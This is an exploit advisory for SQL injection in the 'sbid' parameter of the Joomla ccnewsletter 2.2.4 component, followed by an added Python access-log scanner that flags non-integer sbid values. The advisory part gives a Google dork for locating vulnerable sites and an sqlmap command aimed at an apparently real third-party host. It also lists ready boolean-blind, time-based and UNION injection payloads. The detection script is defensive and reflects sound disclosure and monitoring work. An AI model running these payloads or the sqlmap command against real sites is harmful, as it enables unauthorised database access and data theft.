"Joomla component ccnewsletter 2.2.4 - 'sbid' Parameter SQL Injection"
# Exploit Title: Joomla component ccnewsletter 2.2.4 - SQL Injection
# Date: 2019.09.23
# Exploit Author: Mahdi Karimi
# Vendor HomePage: https://extensions.joomla.org/extension/ccnewsletter/
# Version: 2.2.4 [Final Version]
# Tested on: win
# Google Dork: inurl:index.php?option=com_ccnewsletter inurl:sbid
sqlmap:
sqlmap -u "http://news.healthforanimals.org/index.php?option=com_ccnewsletter&view=detail&id=97&sbid=148&Itemid=4&tmpl=newsletter" -p sbid --dbs
Testing Methods:
- boolean-based blind
- time-based blind
- UNION query
Parameter: sbid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_ccnewsletter&view=detail&id=97&sbid=148 AND 3304=3304&Itemid=4&tmpl=newsletter
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: option=com_ccnewsletter&view=detail&id=97&sbid=148 AND SLEEP(5)&Itemid=4&tmpl=newsletter
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: option=com_ccnewsletter&view=detail&id=97&sbid=-3378 UNION ALL SELECT NULL,CONCAT(0x716a767871,0x416d6c435542734d6155546b64495978596547517a484468426e59664775654359556950614f4d72,0x71766b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uxIT&Itemid=4&tmpl=newsletter
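
Detection example (added here, not part of the original advisory): all three payloads above put non-numeric content into `sbid`, so an access-log check that requires `sbid` to be a plain integer on `com_ccnewsletter` requests flags each of them. The log lines, the function names and the rule that a valid `sbid` is a non-negative integer (as in `sbid=148`) are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate sbid is a plain non-negative integer, as in sbid=148.
VALID_SBID = re.compile(r"[0-9]{1,10}")
# Request target from a combined-format access log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Sep/2019:10:00:01 +0000] "GET /index.php?option=com_ccnewsletter&view=detail&id=97&sbid=148&Itemid=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Sep/2019:10:00:05 +0000] "GET /index.php?option=com_ccnewsletter&view=detail&id=97&sbid=148%20AND%203304%3D3304&Itemid=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Sep/2019:10:00:09 +0000] "GET /index.php?option=com_ccnewsletter&view=detail&id=97&sbid=148+AND+SLEEP(5)&Itemid=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [23/Sep/2019:10:00:20 +0000] "GET /index.php?option=com_ccnewsletter&view=detail&id=97&sbid=-3378%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20x&Itemid=4 HTTP/1.1" 200 812',
    '198.51.100.7 - - [23/Sep/2019:10:00:31 +0000] "GET /index.php?option=com_ccnewsletter&view=detail&id=97&sbid=148&sbid=149 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [23/Sep/2019:10:01:00 +0000] "GET /index.php?option=com_content&view=article&sbid=abc HTTP/1.1" 200 901',
]

def check_line(line):
    """Return a reason string if the line carries a suspicious sbid, else None."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_ccnewsletter" not in params.get("option", []):
        return None  # other components are out of scope for this check
    values = params.get("sbid", [])
    if len(values) > 1:
        return "sbid supplied more than once"
    for value in values:  # parse_qs has already percent-decoded the value
        if not VALID_SBID.fullmatch(value):
            return "non-integer sbid: %r" % value[:40]
    return None

def scan(lines):
    """Return (line_number, reason) for every flagged line, 1-indexed."""
    hits = []
    for number, line in enumerate(lines, 1):
        reason = check_line(line)
        if reason:
            hits.append((number, reason))
    return hits

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print("line %d: %s" % (number, reason))
```

The same integer-only rule belongs on the server side as input validation for `sbid`; the log check only shows where the parameter has already been probed.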